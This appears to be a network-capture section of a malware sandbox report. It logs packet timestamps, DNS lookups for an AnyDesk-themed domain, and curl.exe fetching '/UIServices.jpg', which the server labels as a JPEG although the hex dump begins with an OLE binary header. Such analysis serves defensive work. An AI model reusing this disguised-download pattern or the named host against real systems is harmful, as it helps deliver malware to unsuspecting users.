                                                  Nov 30, 2022 00:37:16.767707109 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.767724991 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.767743111 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.767760038 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.767776966 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.767792940 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.767810106 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.767827034 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.767843962 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.767862082 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.767874956 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.767887115 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.767899990 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.767918110 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.767934084 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.767951965 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.767970085 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.767986059 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768002987 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768019915 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768026114 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768037081 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768054962 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768074036 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768084049 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768084049 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768091917 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768107891 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768114090 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768132925 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768151999 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768170118 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768186092 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768188000 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768207073 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768220901 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768225908 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768243074 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768244982 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768264055 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768280983 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768292904 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768299103 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768316984 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768326044 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768336058 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768347025 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768354893 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768372059 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768383980 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768389940 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768408060 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768416882 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768425941 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768443108 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768459082 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768470049 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768476963 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768487930 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768496037 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768512964 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768531084 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768542051 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768548012 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768565893 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768578053 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768583059 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768600941 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768600941 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768619061 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768629074 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768636942 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768655062 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768662930 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768672943 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768691063 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768707037 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768716097 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768723965 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768734932 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768744946 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768760920 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768771887 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768778086 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768796921 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768809080 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768815041 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768832922 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768846035 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768851042 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768870115 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768878937 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768887997 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768904924 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768915892 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768923044 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768942118 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768950939 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.768959999 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768976927 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.768985987 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.769015074 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.769224882 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.795175076 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.795203924 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.795222044 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.795238018 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.795254946 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.795274019 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.795398951 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.982013941 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982053041 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982069969 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982083082 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982100964 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982120037 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982135057 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982153893 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982247114 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.982259989 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982280970 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982297897 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982314110 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982312918 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.982330084 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982347965 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982362986 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982374907 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.982383013 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982402086 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982410908 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.982420921 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982431889 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.982458115 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982469082 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.982475996 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982506037 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982523918 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982532978 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.982542038 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982561111 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982563019 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.982578993 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982597113 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982608080 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.982615948 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982634068 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982639074 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.982652903 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982671022 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982687950 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982692957 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.982707977 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982724905 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982729912 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.982743979 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982748032 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.982763052 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982781887 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982790947 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.982799053 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982816935 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982824087 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.982835054 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982852936 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982855082 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.982871056 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982893944 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.982923031 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982942104 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982960939 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.982975006 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.982980967 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983000994 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983006954 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.983020067 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983036995 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983041048 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.983056068 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983072042 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983074903 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.983091116 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983108044 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983110905 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.983127117 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983144999 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983150005 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.983164072 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983176947 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.983182907 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983201027 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983217001 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983220100 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.983234882 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983252048 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983263016 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.983269930 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983288050 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983294010 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.983305931 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983323097 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983325958 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.983342886 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983360052 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983376980 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983378887 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.983396053 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983401060 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.983414888 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983432055 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983437061 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.983450890 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983463049 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.983469009 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983489990 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983505964 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983511925 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.983525038 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983541965 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983545065 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.983561039 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983580112 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983582973 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.983597994 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983616114 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983623981 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.983633995 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983650923 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:16.983658075 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:16.983689070 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:17.008414984 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:17.008451939 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:17.008470058 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:17.008501053 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:17.008517981 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:17.008536100 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:17.008558989 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:17.008624077 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:17.196608067 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:17.196650982 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:17.196674109 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:17.196717978 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:17.196742058 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:17.196760893 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:17.196805000 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:17.196861029 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:17.399211884 CET4969980192.168.2.3191.252.51.12
                                                  Nov 30, 2022 00:37:17.612628937 CET8049699191.252.51.12192.168.2.3
                                                  Nov 30, 2022 00:37:17.612725973 CET4969980192.168.2.3191.252.51.12
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 30, 2022 00:37:08.175601959 CET6270453192.168.2.38.8.8.8
                                                  Nov 30, 2022 00:37:08.255781889 CET4997753192.168.2.38.8.8.8
                                                  Nov 30, 2022 00:37:08.419220924 CET53627048.8.8.8192.168.2.3
                                                  Nov 30, 2022 00:37:08.492824078 CET53499778.8.8.8192.168.2.3
                                                  Nov 30, 2022 00:37:11.106987953 CET5784053192.168.2.38.8.8.8
                                                  Nov 30, 2022 00:37:11.126446009 CET53578408.8.8.8192.168.2.3
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Nov 30, 2022 00:37:08.175601959 CET192.168.2.38.8.8.80xdc4fStandard query (0)anydesk10.hospedagemdesites.wsA (IP address)IN (0x0001)false
                                                  Nov 30, 2022 00:37:08.255781889 CET192.168.2.38.8.8.80x3dd4Standard query (0)anydesk10.hospedagemdesites.wsA (IP address)IN (0x0001)false
                                                  Nov 30, 2022 00:37:11.106987953 CET192.168.2.38.8.8.80x7ec5Standard query (0)anydesk10.hospedagemdesites.wsA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Nov 30, 2022 00:37:08.419220924 CET8.8.8.8192.168.2.30xdc4fNo error (0)anydesk10.hospedagemdesites.ws191.252.51.12A (IP address)IN (0x0001)false
                                                  Nov 30, 2022 00:37:08.492824078 CET8.8.8.8192.168.2.30x3dd4No error (0)anydesk10.hospedagemdesites.ws191.252.51.12A (IP address)IN (0x0001)false
                                                  Nov 30, 2022 00:37:11.126446009 CET8.8.8.8192.168.2.30x7ec5No error (0)anydesk10.hospedagemdesites.ws191.252.51.12A (IP address)IN (0x0001)false
                                                  • anydesk10.hospedagemdesites.ws
                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.349697191.252.51.1280C:\Windows\System32\curl.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Nov 30, 2022 00:37:08.688361883 CET137OUTGET /UIServices.jpg HTTP/1.1
                                                  Host: anydesk10.hospedagemdesites.ws
                                                  User-Agent: curl/7.55.1
                                                  Accept: */*
                                                  Nov 30, 2022 00:37:08.900717974 CET139INHTTP/1.1 200 OK
                                                  Date: Tue, 29 Nov 2022 23:33:03 GMT
                                                  Server: Apache
                                                  Last-Modified: Sun, 27 Nov 2022 21:40:24 GMT
                                                  Content-Length: 2719744
                                                  Content-Type: image/jpeg
                                                  Cache-Control: No-Cache
                                                  Pragma: no-cache
                                                  X-Varnish: 191544648 191871687
                                                  Age: 245
                                                  Via: 1.1 varnish-v4
                                                  Accept-Ranges: bytes
                                                  Connection: keep-alive
                                                  Data Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 04 00 fe ff 0c 00 06 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 00 10 00 00 02 00 00 00 01 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: >
                                                  Nov 30, 2022 00:37:08.900769949 CET140INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Nov 30, 2022 00:37:08.900814056 CET141INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Nov 30, 2022 00:37:08.900871992 CET143INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
